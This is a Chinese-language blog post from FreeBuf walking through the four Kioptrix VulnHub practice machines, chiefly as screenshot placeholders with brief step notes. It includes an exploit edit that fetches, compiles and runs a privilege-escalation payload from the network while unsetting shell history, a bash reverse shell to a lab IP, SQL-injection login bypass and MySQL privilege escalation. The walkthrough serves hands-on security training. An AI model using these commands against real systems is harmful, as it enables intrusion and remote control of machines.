freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CTF靶场系列-Kioptrix全集
2019-03-09 16:57:23
所属地 广东省

下载地址

#Kioptrix: Level 1 (#1)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 

#Kioptrix: Level 1.1 (#2)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

#Kioptrix: Level 1.2 (#3)

https://download.vulnhub.com/kioptrix/KVM3.rar
#Kioptrix: Level 1.3 (#4)
https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar

实战演练

Kioptrix_Level_1

查找该靶机的IP为192.168.199.230
image.png扫描端口
image.pngnikto扫到了不起的东西
image.pngimage.png试试这两个exp
image.png编译报错
image.png安装这个
image.png发现还是报错,查了一下
在764.c里面加入下面几句
#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16


就可以编译成功
这个站好像死了,我们换另外一个网站的
image.png位置在这里624行,修改成下面
#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n”

image.pngOK,搞定了
image.png

Kioptrix_Level_1.1

扫描网段,找到IP为192.168.199.170

image.png80端口打开,看看有没有东西

image.png有登录框使用万能密码登录一下

image.png

sqlmap跑了一下,有注入,不过后面有命令执行,就忽略

image.png

看到这样的套路,就知道有命令执行漏洞
image.pngimage.png内核版本
image.png
使用nc监听1234端口,然后在PHP执行下面命令
;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1
image.pngimage.png
提权
image.pngimage.png提权成功

Kioptrix_Level_1.2

找到靶机的IP是192.168.199.218
image.pngimage.pngimage.pngimage.pngweb系统要做host
image.pngimage.png在web扫了一波注入,找到了这个注入点
image.png数据库
image.pngimage.pngimage.png找到了一些信息
image.png
使用这两个账号能够登录进ssh
image.png按F3,进入到这个文件进行修改,然后按F2保存
image.png搞定
image.png

kioptrix_level 1.3

压缩包解压后,发现只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘
image.png把原来的硬盘删掉,添加这块硬盘
image.png增加成功
image.png扫描到靶机的IP是192.168.199.100
image.pngimage.pngimage.png
找到了几个用户
image.png扫描web目录
image.png进入到web系统,发现有登录框,测试发现使用上面扫描到用户,可以爆出来用户密码
image.png
image.png使用ssh登录进去
image.pngimage.png使用mysql提权
image.png
# CTF # 靶机环境
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录